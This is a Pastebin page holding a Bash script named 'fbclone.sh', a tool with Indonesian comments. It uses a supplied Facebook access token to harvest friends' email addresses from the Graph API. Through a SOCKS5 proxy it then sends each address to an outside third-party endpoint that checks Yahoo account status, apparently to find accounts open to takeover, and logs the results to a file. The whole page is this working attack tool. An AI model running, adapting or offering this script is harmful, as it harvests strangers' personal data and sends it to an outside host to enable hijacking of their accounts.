Advertisement
widhisec

fbclone.sh

Jun 21st, 2021
1,155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.28 KB | None | 0 0
  1. #!/bin/bash
  2. # -(c) zsecc0de-crew.id ~ widhisec
  3. # -createon   : 16/04/2019
  4. # -lastupdate : 07/05/2019
  5. # -toolsname  : hoo cloning
  6. # gak usah di edit nanti erorr gan
  7. clear;
  8. command -v curl > /dev/null 2>&1 || { echo >&2 "cURL not installed [!]"; }
  9. if [[ ! -z $(command -v grep) ]]; then
  10.     printf ""
  11. else
  12.     sleep 2
  13.     apt install grep
  14.     printf "selesai terinstall.\n"
  15. fi
  16. GREEN=$(tput setaf 2)
  17. RED=$(tput setaf 1)
  18. NORMAL=$(tput sgr0)
  19. CYAN=$(tput setaf 6)
  20. ti=$(set `date` && echo -e "$4 $5" | cut -d : -f1,2);
  21. function banner () {
  22. printf "
  23. \t$GREEN.__                  
  24. \t|  |__   ____   ____  
  25. \t|  |  \ /  _ \ /  _ \  [${RED}Create By ${CYAN}Widhisec]
  26. \t|   Y  (  <_> |  <_> )
  27. \t|___|  /\____/ \____/
  28. \t     \/  
  29. \t
  30. "
  31. }
  32. banner
  33. function get_yahoo () {
  34.  
  35.                    get_yahoo=$(curl --silent "http://widhitools.000webhostapp.com/api/yahoo.php?" --data "email=$aa" --socks5 $s0cks |
  36.                    grep -Po '(?<="status":)[^,]*' | tr -d '""}')
  37.                    printf "$aa > $get_yahoo \n" >> output.txt
  38.                    printf "${CYAN}$aa [STATUS] > ${NORMAL}$get_yahoo\n"
  39. }
  40. function hey_kamu () {
  41.                    echo -e -n $RED'[?]'${NORMAL}' socks5 : '
  42.                    read s0cks
  43.                    echo -e -n $RED'[?]'${NORMAL}' Token  : '
  44.                    read t0k3n
  45.                    echo "tunggu bentar.."
  46.                    if [[ ! -e $t0k3n  ]]; then
  47.                        printf "${RED}[!] ${NORMAL}tidak ada file token\n"
  48.                        exit
  49.                    fi
  50.                    gEt=$(curl -X GET POST -s "https://graph.facebook.com/v3.2/me/friends/?fields=email&access_token=`cat $t0k3n`&limit=5000" | jq -r .data | grep -Po '(?<="email":)[^,]*' | tr -d '""')
  51. (
  52.                for aa in $gEt; do
  53.                     startline=1 ###
  54.                     endline="$threads"
  55.                     counter=0
  56.                     default_threads="10"
  57.                     threads="${1:-${default_threads}}"
  58.                     token=$(($counter+1))
  59.                     let token++
  60.                     let counter++
  61.                     let startline+=$threads
  62.                     let endline+=$threads
  63.                     get_yahoo "{$aa}" &
  64.                     done
  65.                     wait
  66.  
  67. )
  68. }
  69. hey_kamu
  70. echo "selesai pada jam : $ti"
  71. echo "saved output.txt"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement